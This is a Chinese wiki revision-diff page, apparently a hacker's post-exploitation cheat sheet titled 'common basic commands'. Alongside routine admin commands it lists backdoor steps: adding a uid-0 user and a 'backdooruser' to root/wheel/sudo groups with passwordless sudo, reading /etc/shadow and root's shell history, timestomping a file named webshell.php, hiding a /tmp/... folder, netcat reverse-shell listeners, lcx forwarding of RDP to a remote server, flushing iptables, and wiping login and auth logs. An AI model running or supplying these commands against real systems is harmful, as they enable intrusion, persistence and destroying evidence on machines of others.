用户工具

站点工具


网络安全:常用基本命令

差别

这里会显示出您选择的修订版和当前版本之间的差别。

到此差别页面的链接

两侧同时换到之前的修订记录 前一修订版
后一修订版
前一修订版
网络安全:常用基本命令 [2017/07/22 08:58]
YoCo Smart
网络安全:常用基本命令 [2020/05/16 19:19] (当前版本)
行 1: 行 1:
 === 添加root权限用户 === === 添加root权限用户 ===
  
-  useradd -o -u 0 silic+<code:bash>useradd -o -u 0 silic</code> 
 + 
 +=== 非交互式修改密码 === 
 + 
 +<code> 
 +echo "mima123"|passwd –stdin usersilic 
 +echo "usersilic:mima123" | chpasswd 
 +</code>
  
 === 压缩 === === 压缩 ===
  
-  #压缩 +<code:bash> 
-  tar -zcvpf silic.tar.gz xxxx +#压缩 
-  #解压 +tar -zcvpf silic.tar.gz xxxx 
-  tar -zxvpf silic.tar.gz xxxx+#解压 
 +tar -zxvpf silic.tar.gz xxxx 
 +</code>
  
 === 更改文件属性 === === 更改文件属性 ===
  
-  更改为0777 +<code:bash> 
-  chmod 777 silic.php +#更改为0777 
-  更改所有者 +chmod 777 silic.php 
-  chown -R apache:apache silic.php +更改所有者 
-  更改用户组 +chown -R apache:apache silic.php 
-  chgrp -R apache silic.php+更改用户组 
 +chgrp -R apache silic.php 
 +</code>
  
 === 踢人 === === 踢人 ===
  
-  #查看在线用户 +<code:bash> 
-  +#查看在线用户 
-  #踢人 +
-  skill -KILL -v pts/*+#踢人 
 +skill -KILL -v pts/* 
 +</code>
  
 === 重启服务 === === 重启服务 ===
  
-  service mysqld restart+<code:bash>service mysqld restart</code>
  
 === 清除iptable阻碍 === === 清除iptable阻碍 ===
  
-  iptables -L -n #查看本机情况 +<code:bash> 
-  iptables -F #清除预设 +iptables -L -n #查看本机情况 
-  iptables -X #清除自定义 +iptables -F #清除预设 
-  service iptables restart #重启服务+iptables -X #清除自定义 
 +service iptables restart #重启服务 
 +</code>
  
 === 生成htpasswd密码 === === 生成htpasswd密码 ===
  
-  htpasswd -nb silic passwd+<code:bash>htpasswd -nb silic passwd</code>
  
 === 开机启动相关 === === 开机启动相关 ===
  
-  #查看启动服务 +<code:bash> 
-  chkconfig +#查看启动服务 
-  #追歼启动命令 +chkconfig 
-  /etc/rc.d/rc.local+#追歼启动命令 
 +/etc/rc.d/rc.local 
 +</code> 
 + 
 +=== 使用yum快速安装 === 
 + 
 +<code:bash>yum install nmap</code> 
 + 
 +=== 读取配置 === 
 + 
 +<code:bash> 
 +#用户列表和环境 
 +cat /etc/passwd 
 +#密文(root权限) 
 +cat /etc/shadow 
 +#系统版本 
 +uname -a 
 +lsb_release -a 
 +cat /etc/issue 
 +#环境变量 
 +cat /proc/self/environ 
 +</code> 
 + 
 +=== 历史记录 === 
 + 
 +<code:bash> 
 +cat /root/.bash_history 
 +cat /home/silic/.bash_history 
 +</code> 
 + 
 +=== rsync同步 === 
 + 
 +<code:bash> 
 +#将远程服务器192.168.1.111的文件同步至本地 
 +/usr/bin/rsync -avz [email protected]:/usr/local/nginx/conf/nginx.conf /tmp/conf.bak 
 +#将本地服务器同步至远程服务器192.168.1.111 
 +/usr/bin/rsync -avz  /tmp/silic.txt [email protected]:/home/work/postfixadmin/languages/br.php 
 +</code> 
 + 
 +=== 修改文件时间戳 === 
 + 
 +<code:bash> 
 +#转换标准时间到时间戳,UTC/GMT/CST:世界协调时间/格林威治标准时间/中国沿海时间 
 +date -d "2011-11-11 11:11:11 UTC" +%s 
 +#修改时间戳 
 +touch -t yymmddhhmm 
 +touch -t 201203042109.02 /home/www/webshell.php 
 +</code> 
 + 
 +=== 查看进程列表 === 
 + 
 +<code:bash>ps -ef</code> 
 + 
 +=== 杀死进程 === 
 + 
 +<code:bash>kill -s 9 XXXX_PID</code> 
 + 
 +=== 查看硬盘使用情况 === 
 + 
 +<code:bash>df -lh</code> 
 + 
 +=== 路由追踪 === 
 + 
 +<code> 
 +#Linux 
 +traceroute www.google.com 
 +#Windows 
 +tracert www.google.com 
 +</code> 
 + 
 +=== 创建简单"隐藏"文件夹 === 
 + 
 +<code:bash>mkdir /tmp/...</code> 
 + 
 +=== nc反弹端口监听 === 
 + 
 +<code:bash> 
 +#windows 
 +nc -vv -l -p 5555 
 +#Linux 
 +nc -l 5555 
 +</code> 
 + 
 +=== lcx转发端口 === 
 + 
 +<code:bash> 
 +#本地监听3333端口并转发至4444端口 
 +lcx -l 3333 4444 
 +#将本地3389端口映射至远程 
 +lcx.exe -s your-server-ip 3333 127.0.0.1 3389 
 +</code> 
 + 
 +=== 日志清理 === 
 + 
 +<code:bash> 
 +echo > /var/log/wtmp 
 +echo > /var/log/btmp 
 +echo > /var/log/lastlog 
 +echo > /var/log/auth.log 
 +</code> 
 + 
 +=== 统计文件夹大小 === 
 + 
 +<code:bash>du -h /tmp</code> 
 + 
 +=== Linux读取NTF共享 === 
 + 
 +<code:bash> 
 +showmount -e x.x.x.x 
 +/usr/sbin/showmount 
 +mount -t nfs x.x.x.x:/home/test /tmp/test 
 +</code> 
 + 
 +=== 添加sudo用户 === 
 + 
 +(添加一个uid为0的用户以后,更改这个uid为0的用户密码原root用户密码也会被更改,所以一般添加用户后为用户更改用户组,使用sudo执行命令) 
 +<code:bash> 
 +usermod -a -G root backdooruser 
 +usermod -a -G wheel backdooruser 
 +usermod -a -G sudo backdooruser 
 +</code> 
 + 
 +=== 赋予用户sudo权限 === 
 + 
 +<code:bash> 
 +#允许用户backuser输入密码执行sudo 
 +backuser ALL=(ALL) ALL 
 +#允许用户组backuser里的用户输入密码执行sudo命令 
 +%backuser ALL=(ALL) ALL 
 +#允许用户backuser不输入密码执行sudo命令 
 +backuser ALL=(ALL) NOPASSWD: ALL 
 +#允许用户组backuser不输入密码执行sudo命令 
 +%backuser ALL=(ALL) NOPASSWD: ALL 
 +</code>
  
 ===  === ===  ===
-===  === + 
-===  === +<code:bash></code>
-===  === +
-===  === +
-===  === +
-===  ===+
  
网络安全/常用基本命令.1500713923.txt.gz · 最后更改: 2020/05/16 19:14 (外部编辑)